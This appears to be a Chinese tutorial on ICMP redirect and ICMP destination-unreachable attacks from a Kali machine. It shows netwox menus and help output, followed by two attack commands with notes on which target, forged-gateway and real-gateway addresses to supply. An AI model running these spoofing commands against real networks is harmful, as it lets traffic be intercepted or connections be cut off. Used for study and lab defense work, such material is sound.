
  • ICMP重定向攻击
    • 攻击原理
    • 攻击过程
    • 攻击代码
    • 防御措施
  • ICMP不可达攻击
    • 攻击原理
    • 攻击代码
    • 防御措施









kali@kali:~$ netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.######################## MAIN MENU #########################0 - leave netwox3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + informationb + network protocolc + application protocold + sniff (capture network packets)e + spoof (create and send packets)f + record (file containing captured packets)g + clienth + serveri + ping (check if a computer if reachable)j + traceroute (obtain list of gateways)k + scan (computer and port discovery)l + network auditm + brute force (check if passwords are weak)n + remote administrationo + tools not related to network
Select a node (key in 03456abcdefghijklmno): b##################### network protocol #####################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + Ethernetb + IPc + UDPd + TCPe + ICMPf + ARP
Select a node (key in 0123456abcdef): e########################### ICMP ###########################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + ICMP spoofb + ICMP serverc + network audit using ICMP
Select a node (key in 0123456abc): c################# network audit using ICMP #################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda - 73:Simulate presence of a/several computer/s (arp and ping)b - 81:Send an ICMP4 timestampc - 82:Sniff and send ICMP4/ICMP6 destination unreachabled - 83:Sniff and send ICMP4/ICMP6 time exceedede - 84:Sniff and send ICMP4/ICMP6 parameter problemf - 85:Sniff and send ICMP4 source quenchg - 86:Sniff and send ICMP4/ICMP6 redirect
Select a node (key in 0123456abcdefg): g################# help for tool number 86 ##################
Title: Sniff and send ICMP4/ICMP6 redirect
| This tool sends an ICMP error message when a packet matching filter    |
| is sniffed.                                                            |
| Parameter --device indicates on which device to sniff. Please note     |
| that under some systems, such as Windows, sniffing on some devices is  |
| not supported.                                                         |
| Parameter --filter defines the sniff filter. It permits to restrict    |
| captured packets. This kind of filter is named a BPF or pcap filter.   |
| Basic elements of a filter are:                                        |
|   host                                                         |
|   net 192.168.10                                                       |
|   net mask                                  |
|   net                                                  |
|   port 21                                                              |
|   dst host                                                     |
|   src port 2345                                                        |
|   ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working)          |
|   ether src aa:bb:cc:dd:ee:ff                                          |
|   ip                                                                   |
|   arp                                                                  |
|   rarp                                                                 |
|   tcp                                                                  |
|   icmp                                                                 |
|   udp                                                                  |
| Here are filter examples:                                              |
|   "host"                                                       |
|   "net 192.168 and icmp"                                               |
|   "host or dst port 80"                                        |
|   "(udp or tcp) and not host"                                  |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here  |
| is the list of accepted values:                                        |
|  - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
|    a firewall is installed, or on some systems, this might not work.   |
|  - 'linkf' means to spoof at link level (currently, only Ethernet is   |
|    supported). The 'f' means to Fill source Ethernet address.          |
|    However, if source IP address is spoofed, it might be impossible    |
|    to Fill it. So, linkf will not work: use linkb or linkfb instead.   |
|  - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
|    source Ethernet address (0:0:0:0:0:0, do not try to Fill it).       |
|  - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
|    source Ethernet address, but if it is not possible, it is left      |
|    Blank.                                                              |
|  - 'rawlinkf' means to try 'raw', then try 'linkf'                     |
|  - 'rawlinkb' means to try 'raw', then try 'linkb'                     |
|  - 'rawlinkfb' means to try 'raw', then try 'linkfb'                   |
|  - 'linkfraw' means to try 'linkf', then try 'raw'                     |
|  - 'linkbraw' means to try 'linkb', then try 'raw'                     |
|  - 'linkfbraw' means to try 'linkfb', then try 'raw'                   |
|  - 'link' is an alias for 'linkfb'                                     |
|  - 'rawlink' is an alias for 'rawlinkfb'                               |
|  - 'linkraw' is an alias for 'linkfbraw'                               |
|  - 'best' is an alias for 'linkraw'. It should work in all cases.      |
|                                                                        |
| This tool may need to be run with admin privilege in order to sniff    |
| and spoof.                                                             |
Usage: netwox 86 [-d device] [-f filter] -g ip [-s spoofip] [-c uint32] [-i ip]
Parameters:-d|--device device             device name {Eth0}-f|--filter filter             pcap filter-g|--gw ip                     new gateway {}-s|--spoofip spoofip           IP spoof initialization type {linkbraw}-c|--code uint32               ICMP code {0}-i|--src-ip ip                 source IP address {}
Example: netwox 86 -g ""
Example: netwox 86 --gw ""
Press 'r' or 'k' to run this tool, or any other key to continue 


netwox 86 -f "host "–gw “” -i ""
-f : 写要攻击的目标主机IP地址
–gw :写要添加的伪造的网关,即攻击者的IP地址
-i :写真正的网关地址







root@kali:/home/kali# netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.######################## MAIN MENU #########################0 - leave netwox3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + informationb + network protocolc + application protocold + sniff (capture network packets)e + spoof (create and send packets)f + record (file containing captured packets)g + clienth + serveri + ping (check if a computer if reachable)j + traceroute (obtain list of gateways)k + scan (computer and port discovery)l + network auditm + brute force (check if passwords are weak)n + remote administrationo + tools not related to network
Select a node (key in 03456abcdefghijklmno): b##################### network protocol #####################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + Ethernetb + IPc + UDPd + TCPe + ICMPf + ARP
Select a node (key in 0123456abcdef): e########################### ICMP ###########################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda + ICMP spoofb + ICMP serverc + network audit using ICMP
Select a node (key in 0123456abc): c################# network audit using ICMP #################0 - leave netwox1 - go to main menu2 - go to previous menu3 - search tools4 - display help of one tool5 - run a tool selecting parameters on command line6 - run a tool selecting parameters from keyboarda - 73:Simulate presence of a/several computer/s (arp and ping)b - 81:Send an ICMP4 timestampc - 82:Sniff and send ICMP4/ICMP6 destination unreachabled - 83:Sniff and send ICMP4/ICMP6 time exceedede - 84:Sniff and send ICMP4/ICMP6 parameter problemf - 85:Sniff and send ICMP4 source quenchg - 86:Sniff and send ICMP4/ICMP6 redirect
Select a node (key in 0123456abcdefg): c################# help for tool number 82 ##################
Title: Sniff and send ICMP4/ICMP6 destination unreachable
| This tool sends an ICMP error message when a packet matching filter    |
| is sniffed.                                                            |
| Parameter --device indicates on which device to sniff. Please note     |
| that under some systems, such as Windows, sniffing on some devices is  |
| not supported.                                                         |
| Parameter --filter defines the sniff filter. It permits to restrict    |
| captured packets. This kind of filter is named a BPF or pcap filter.   |
| Basic elements of a filter are:                                        |
|   host                                                         |
|   net 192.168.10                                                       |
|   net mask                                  |
|   net                                                  |
|   port 21                                                              |
|   dst host                                                     |
|   src port 2345                                                        |
|   ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working)          |
|   ether src aa:bb:cc:dd:ee:ff                                          |
|   ip                                                                   |
|   arp                                                                  |
|   rarp                                                                 |
|   tcp                                                                  |
|   icmp                                                                 |
|   udp                                                                  |
| Here are filter examples:                                              |
|   "host"                                                       |
|   "net 192.168 and icmp"                                               |
|   "host or dst port 80"                                        |
|   "(udp or tcp) and not host"                                  |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here  |
| is the list of accepted values:                                        |
|  - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
|    a firewall is installed, or on some systems, this might not work.   |
|  - 'linkf' means to spoof at link level (currently, only Ethernet is   |
|    supported). The 'f' means to Fill source Ethernet address.          |
|    However, if source IP address is spoofed, it might be impossible    |
|    to Fill it. So, linkf will not work: use linkb or linkfb instead.   |
|  - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
|    source Ethernet address (0:0:0:0:0:0, do not try to Fill it).       |
|  - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
|    source Ethernet address, but if it is not possible, it is left      |
|    Blank.                                                              |
|  - 'rawlinkf' means to try 'raw', then try 'linkf'                     |
|  - 'rawlinkb' means to try 'raw', then try 'linkb'                     |
|  - 'rawlinkfb' means to try 'raw', then try 'linkfb'                   |
|  - 'linkfraw' means to try 'linkf', then try 'raw'                     |
|  - 'linkbraw' means to try 'linkb', then try 'raw'                     |
|  - 'linkfbraw' means to try 'linkfb', then try 'raw'                   |
|  - 'link' is an alias for 'linkfb'                                     |
|  - 'rawlink' is an alias for 'rawlinkfb'                               |
|  - 'linkraw' is an alias for 'linkfbraw'                               |
|  - 'best' is an alias for 'linkraw'. It should work in all cases.      |
|                                                                        |
| This tool may need to be run with admin privilege in order to sniff    |
| and spoof.                                                             |
Usage: netwox 82 [-d device] [-f filter] [-c uint32] [-i ip] [-s spoofip]
Parameters:-d|--device device             device name {Eth0}-f|--filter filter             pcap filter-c|--code uint32               ICMP code {0}-i|--src-ip ip                 source IP address {}-s|--spoofip spoofip           IP spoof initialization type {linkbraw}
Example: netwox 82
Press 'r' or 'k' to run this tool, or any other key to continue 


netwox 82 -f “host and port 80” -i ""
-f :服务器的IP地址,可以加上端口号
-i :被攻击者的IP地址




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    一.实验目的 理解ICMP重定向的功能 二.实验拓扑 三.实验工具 GNS3和Wireshark抓包分析软件 四.ICMP协议的封装格式 (1)Type 类型值,标识ICMP分组类型 (2)Code ...

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